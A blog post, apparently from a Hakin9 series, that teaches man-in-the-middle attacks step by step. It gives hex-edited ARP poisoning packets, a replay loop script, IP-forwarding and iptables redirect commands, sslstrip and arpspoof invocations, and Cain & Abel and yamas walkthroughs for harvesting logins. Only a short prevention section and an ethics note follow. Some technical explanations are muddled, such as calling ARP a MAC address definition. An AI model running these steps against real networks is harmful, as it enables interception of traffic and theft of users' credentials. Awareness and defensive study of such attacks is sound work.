Overview
In hakin9.org May release,
I have wrote more on the number of ways of performing MITM and also how to steal information from a SSL channel. Read more to the content and enjoy the journey.
Dangers of Man in the middle attacks to modern life
In modern times, we have been exposed through the use of any of the computers, smart phones or any device which are all connected in a consolidates network. When we term the word network, it means that we can communicate with the other party by sending information through the cables or even in the air.
Introduction
Man in the middle attacks allow those of evil intent to gather information without the knowledge of either communicating party. If done properly, there is little to no sign of the attack, and because of that fact, additional weaknesses are exposed (think recovered usernames and passwords).
But of course, in order to have those communications to be transmitted over the network between different equipment there must be a standard or a certain framework. The model was known as Open Systems Interconnection (OSI) model is a reference model developed by ISO (International Organization for Standardization) in 1984.
The Open Systems Interconnection (OSI) model involves a communication process which have been divided into 7 layers, which divides the tasks involved with moving information between networked computers into seven smaller, more manageable task groups.
In nut shell, the Layers 7 through 4 deal with end to end communications between data source and destinations. Layers 3 to 1 deal with communications between network devices
Explanation of 7 layer OSI in-short
Layer
1: Physical layer
Physical layer defines the cable or
physical medium itself.
Layer
2 : Data link
LinkData Link layer defines the
format of data on the network. A network data frame, aka packet, includes
checksum, source and destination address, and data such as MAC.
Layer
3 : Network
IP is responsible for routing,
directing datagrams from one network to another.
Layer
4 : Transport
Transmission Control Protocol (TCP)
and User Datagram Protocol (UDP), sits at the transport layer.
Layer
5 : Session
The session protocol defines the
format of the data sent over the connections and have a mechanism for opening,
closing and managing a session between end-user application processes.
Layer
6 : Presentation
The canonical uses a standard byte
ordering and structure packing convention, independent of the host delivery and
formatting of information to the application layer for further processing or
display.
Layer
7 : Application
Application running on server such as http, email and etc.
Why should we care?
At the
beginning, we have talk about espionage and now we talk about 7 layer OSI, what
it have to do with the risk?. From my
point of view, they will be another layer which is layer 8 which it is reflect
back to the end users. Layer 8 doesn’t
exist in any OSI layer, but however in my opinion it should be part of it.
Without any user interaction on some cases, how should we expect the data to be
transmitted over?.
Human
always become the bottleneck in the security arena, as because human does
mistake and this is where the problem is. Let me give you an example, if you
are working in corporate organization, I am pretty sure you are well protected
in a very secure network environment. But do you think that would be chances
for these users to use his or her laptop to access internet in other public
network such as in airport, internet café and etc?. Although the likelihood is
low, but do you think it would have chances to happen?
What is Mac address?
Short for
address resolution protocol, a network layer protocol use to convert an IP
address into a physical address which will have the format of MM:MM:MM:SS:SS:SS.
The address is unique to each of the computer hardware. It has 12 digit of
hexadecimal numbers and 48 bits in length. The first half of the address
represents the adapter manufacture. As for the example 00:A0:C9:11:22:33, the
first prefix which is 00:A0:C9 it indicates the manufacture is from Intel
Corporation.
What have bring my interest in this
area would be the security issue when you are running on a flat lan
environment. I will explain detail on this article. Let get started by how
Microsoft assign the pool when the Hyper-V is installed. The MAC address is
divided into 2 part, the first part would be as highlight in color which I have
explain earlier. You can have a look into detail as in figure 1.
00:15:5D:1A:2B:00
The blue
portion is Microsoft OEM , but have you ever think where the red portion coming from? Let me explain to you,
let said your IP address of the Hyper-V is 10.208.26.43 , the second IP number
which it is 26.43 you will need to convert from dec to Hex which you will get 1A:2B.
So each time when you deploy the
Hyper-V host the MAC address won't be duplicated. So you will the range of MAC
address pool will have something like as below. FF when you convert it from HEX to DEC you will get 255.
00:15:5D:1A:2B:00 to 00:15:5D:1A:2B:FF.
Figure 1 : registry location to show
the mac address pool
Where the risk, I don’t get it?
This is where the challenge come in to the picture, now
as the perpetrator is getting intelligent day by using the free tools available
in the internet, they can launch a Man in the Middle attack which is also known
as MITM.
What it really does, it impersonate someone in the
network and become a middle man of transmitting information from source to the
destination. By using this way, it also can become a denial of service. I will
explain in more detail as we go along on the technical on how to.
Principle of
ARP Spoofing
To summarize, arp spoofing can be term
as man in the middle attack or a DDOS attack as it will send a not existence
MAC in the network. The diagram below will give you some idea of it.
To give you more an understanding on
the packet, I decide to capture the info on my lab and it consists of different
step and stage.
Man In The Middle by the hard way
Stage 1: Collecting
Packet information
1)The tools we use on this lab is
wireshark, you can download the tools from the following Wireshark Download Page.
2)After you have perform the
installation run the wireshark tools as in figure 2.
Figure 2: Running wireshark
3)Configure the interface for capturing
packet as on figure 3.
Figure 3: Configure interface
4)As per on screen, you will need to
check on Capture packet in promiscuous mode which mean in the sniffing
mode
Figure 4: Capture packet in promiscuous
mode
5)After you have completed all the
setting, click the start button and you will see some packet have been capture.
6)You should be getting some packet as
below, this would be our interest for our next step as in figure 5.
Figure 5: Result of info collection
Stage 2 : Analysis of
the packet
1. This is the sample of
the right content of the files.
2. Export the selected
packet to /tmp/script/arp
3. Edit the files by
typing this command (hexedit –b /tmp/script/arp)
Info
Remark
Destination
00 50 56 F4 78 89 (GW) @192.168.18.2
Target Ip
add
C0 A8 12 02 (GW) @
192.168.18.2
Source
00 0C 29 F1 EF DB (Hacker) @ 192.168.18.139
Sender
IP
C0 A8 12 8B (Hacker) @ 192.168.18.139
Victim
00
0C 29 13 80 DD @ 192.168.18.130
Victim
IP
C0 A8 12 82 (GW) @ 192.168.18.130
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89 08 06 00
01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50 56 F4 78 89 C0 A8 12 02
.......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8 12 8B 00 00 00 00 00
00 ..).............
00000030 00 00 00 00 00 00
00 00 00 00 00
00
............
Stage 3: Modify
Packet
1. Start modify the victim packet
2. hexedit –b arp-victim
3. replace hacker mac
address with viticm mac address
4. replace gateway mac
address with hacker mac address
Before changing the packet
00000000 00 0C 29 F1 EF DB 00 50 56 F4 78 89
08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 50
56 F4 78 89 C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 F1 EF DB C0 A8
12 8B 00 00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00
00 00 00 00 00
00
............
After Changing the packet
00000000 00
0C 29 13 80 DD 00 0C 29 F1 EF DB
08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB
C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00
00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00
00 00 00 00 00
00
............
5. Save the files as
arp-victim and sent the files to the victim
6. file2cable -v -i eth0
-f arp-victim
Summary on what have
been modified
Before packet been modified
Hacker Mac
|
Gateway Mac
|
X
|
X
|
Gateway Mac
|
Gateway IP address
|
Hacker Mac
|
Hacker IP
|
x
|
After packet been modified
Victim
Mac
|
Hacker Mac
|
x
|
x
|
Hacker Mac
|
Gateway Ip address
|
Victim
Mac
|
Victim Ip
address
|
x
|
Stage 4: Modify
Gateway packet
1. Cp arp-victim
arp-gateway
2. Hexedit –b
arp-gateway
Before Changing the packet
00000000 00
0C 29 13 80 DD 00 0C 29 F1 EF DB
08 06 00 01 ..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB
C0 A8 12 02 .......PV.x.....
00000020 00 0C 29 13 80 DD C0 A8 12 82 00
00 00 00 00 00 ..).............
00000030 00 00 00 00 00 00
00 00 00 00 00
00
............
After Changing the packet
00000000 00 50 56 F4 78 89 00 0C 29 F1 EF DB 08 06 00 01
..)....PV.x.....
00000010 08 00 06 04 00 02 00 0C 29 F1 EF DB
C0 A8 12 82
.......PV.x.....
00000020 00 50 56 F4 78 89 C0 A8 12 02 00 00 00 00 00
00 ..).............
00000030 00 00 00 00 00 00
00 00 00 00 00
00
............
Stage 5: Enable IP
forwarding
1. As explain earlier,
if we don’t have this step been configure on stage 5. The attack it self till
stage 4 will become denial of service. But of course you don’t want those to
happen, because your intention is to collect information.
2. What you need to do
next is to Enable IP forwarding on the backtrack it self. In layman term , it
mean enable routing function on the machines so that the packet can be
transmitted.
Echo 1
> /proc/sys/net/ipv4/ip_forward
Nano
doarp.sh
Chmod 700
doarp.sh
#!/bin/bash
While [ 1
];do
File2cable
–I eth0 –f arp-victim
File2cable
–I eth0 –f arp-gateway
Sleep 2
Done
Summary on what have been modifed
Before packet been modified
Victim Mac
|
Hacker Mac
|
x
|
x
|
Hacker Mac
|
Gateway Ip address
|
Victim Mac
|
Victim IP
|
x
|
After packet been modified
Gateway Mac
|
Hacker Mac
|
x
|
x
|
Hacker Mac
|
Victim Ip
address
|
Gateway Mac
|
Gateway
IP
|
x
|
Stage 6: Wait & monitor
These would be the last step, what you need to do is to
monitor your wireshark and see for any potential any login ID with password.
But if the users are using any encrypted channel, you won’t be able to see the
content.
Man In The Middle new trend
After you have started looking at the
hard way of the MITM, do you think you will use it?. The effort to do it, was
quite a lot and mistake could happen. The chances of success might be low. The
reality is, this is how people do it, long time ago.
Practically no one will do the hard
way, but it is good to understand in depth how arp spoof really works. The soft
way I would be mentioning here will be 2 types, one is more toward on windows
environments and another will be toward on linux environment. I would pick the
most common target that perpetrator will do in order to get the information
they want, and from there you can explore more detail to it.
Building a MITM attacker machine on
Windows
I think most of all the users are on
windows, and they are more comfortable to use windows as the machines to perform
an attack. To built such as machine they are certain thing that you must know.
The first is , don’t ever install any antivirus in your machine. As the
antivirus will remove those files. 2nd don’t ever use that machine
to surf internet to avoid any potential viruses on the machine. While on the
3th comment will be which OS is the prefer option. As mostly software run
pretty well on Windows Xp and this is recommended to be used.
But you must take note as well, the OS is soon going to reach the end of life.
But you must take note as well, the OS is soon going to reach the end of life.
Since we are just focusing on the man
in the middle attack, the favorite tools to be used is Cain & Able. If you
read on the bible, you will notice the name is the 2 son of Adams & Eve.
But today, I am not asking you to read the bible, but I am going to explain
about the tools.
The tools has been
developed in the hope that it will be useful for network administrators,
teachers, security consultants/professionals, forensic staff, security software
vendors, professional penetration tester and everyone else that plans to use it
for ethical reasons. But of the time, the tools have been use for crime.
The tools can do a
lot of damage which include the following:
1. WEP cracking
2. Speeding up packet capture speed by
wireless packet injection
3. Ability to record VoIP conversations
4. Decoding scrambled passwords
5. Calculating hashes
6. Traceroute
7. Revealing password boxes
8. Uncovering cached passwords
9. Dumping protected storage passwords
10.
ARP spoofing
11.
IP to MAC Address resolver
12.
Network Password
Sniffer
Let’s get started
As per on the figure 6, this is how the cain and able look
like, the GUI is user friendly and you can have all the information required in
just of a few clicks.
Figure 6: Cain & Able
The first thing you must do is to identify
your ip address by typing ipconfig /all in your command prompt.
The next steps is to click on the icon to activate Cain & Abel, click ARP, start sniffing, sniffing tab, scan the MAC addresses on the entire network.
Wait sniffing process is complete, click the ARP tab on the bottom, click the "+" sign to add it to the new window will pop up consists of two columns, "now is the time to hack" click IP server in the left column and click the IP address of the victim on the right, do it repeatedly against all targets. But in most cases, we will target all as we don’t know the machine is belong to who. Remember don’t run this on your production environment as it could do a lot of damages.
What would happen in the background is, the
tools will start to run a poisoning attack on the victim IP address. If during
that time, the users are surfing internet via http or any. You would be able to
see it on the password tab. I am not against this tools, but however if the
users is visiting some https website, the users will get a prompt whether they
want to continue on the website. Chances of the users clicking on continue on
the website is high, but then again, I believe we could do better. The tools
also generate a certificate on behalf of the real origin website, but why the
users still get a prompt?. This is because the certificate have a different
thumbprint information. If in your corporate organization, if you are using
some sort of proxy with certificate and if you have trusted the proxy
certificate, that have shown your user ID have been capture. So take notes on
this too.
Building a MITM attacker machine on linux
The approach of doing it, will be
almost the same as for windows, but of course in linux you suppose to expect
more text than GUI. There are 2 approach we can do here, the first approach
will be semi auto and the last approach will be fully automatic.
The first approach you still need to
have some manual work such as configuring the machine to route the traffic, some
firewall rules and reading the logs. I will explain why this is not a good
approach as we go into detail.
To enable the routing function we must
change some value in the /proc as below :
echo 1 >
/proc/sys/net/ipv4/ip_forward
Next step is to configure all incoming
request to be diverted, you can use any destination port that you would like to
use
iptables -t
nat -A PREROUTING -p TCP -- destination-port 80 -j REDIRECT
–to-port 12345
Now this is where the real work start,
you will need to use the terminal and
cd to /pentest/web/sslstrip as we need
to run some python script from there.
To view all the available option in the
command you can type the following command.
Python
ssltrip.ph --help
Options:
-w Specify file to log on
-p log only SSL port
-S log all ssl and http traffic to and
from server
-l port to listen on
-f substitute a lock favicon
-k kill session in progress
-h print help message
To start the command, you would need to
run the command as below :
python
sslstrip.py -l 12345
Now we
need to start the MITM process, if you did see the process is getting simpler
and easy. From the manual way of changing the value till we have a command that
does the spoofing for us.
arpspoof -i
eth0 -t Victim_IP Gateway_IP
Once the client start to surf internet,
all the logs will be capture in sslstrip.log. You can view the real time
changes by using the tail command as shown in below:
tail -f
sslstrip.log
In reality, this will work in a smaller
environment, as if there is too much user is visiting the website, you might
want to use other command such as grep or print command to capture the info that you would
like to see.
What would be the next evolution for
it?
As you have read on the different
steps, either on the manual way, on windows machines or even on linux. Do you
notice that the tools is getting intelligent as the time comes. The steps that
I would like to show above is fully automated and thanks to the developer who
create this tools. Then again, from the security stand point, you can’t
differentiate what is real and fake anymore cybercrime would be expected to be
increases.
The tools is known as yamas which is
available as download from comax.fr/yamas.php . Yamas is a tool
that aims at facilitating man in the middle attacks by automating the whole
process from setting up ip forwarding and modifying iptables, to the ARP cache
poisoning (either using ettercap or arpspoof). The traffic is stripped off ssl
with the famous sslstrip 0.9.
What you need to do it is just run the
command yamas
and wait for the result. When you first run the command, it will ask where
should the traffic should be diverted to which shown as below. Select the
default and press enter.
what port
should the traffic be redirect to? (Default = 8080)
The
second screen you will see is to enter the gateway IP, by default it will
automatic detect the range for you. Press enter to proceed.
Enter Ip
gateway address or press enter to use x.x.x.x
After
that you will be prompt to select the interface. Press enter to use the default
value.
what
interface would you like to use . It should match IP gateway as shown above
As by
default, we will target the entire network, so will just press enter.
We will
target the whole network as default, press 0 for manual
What next here is just wait and all the credential will
be populated on your screen.
Prevention
As
you have read all the steps, it might be look difficult to protect from layer 2
attack. But some of the vendor product does provide protection against the attack such as CISCO
which sometime they name it as dynamic ARP. You must be aware that not all location
can afford to have a prevention devices in place such as public network. This
is why security awareness should be in place to guide the user what they are
allow to do when they are on the public network. There are no such thing as
patches for human, they need to be educated.
Note
on ethics
Our intention, when we started
writing these articles was to give an overview what tools exists on the market
and how we can use it to secure our organization against any unidentified
threats. When you start to use the tools above, please do make sure you have
this with you:
1. Don’t use this for any malicious
intention
2. Don’t attack any organization
without any approval from the top management.
3. Think of the damage that you might
cause
Conclusion
In this article, we have presented on how to perform a
man in the middle attack on linux as well as on windows machine. We have shown
the trick of hiding in the network while we are performing intelligent
information gathering. The author also shows you a common attack that commonly
done by the attacker and to show how fast they could obtain information in the
stealth way. As you can see, the growing of the tools can help anyone to be a
security pen tester, while if it is been used in a wrong hands it could bring
more damage than good. Such attack is much easier to perform and more likely to
succeed. The author sincerely hopes that these short articles can increase the
awareness to anyone who is handling computer or security services. In the
broader sense however, we hope that the information could help you to increase
the security your organization assets in better manner.
Summary
Stay tune with my next articles. Let us know what you though , learns and
hope for next articles!. Connect with us on GOOGLE+ , TWITTER and FACEBOOK.
No comments:
Post a Comment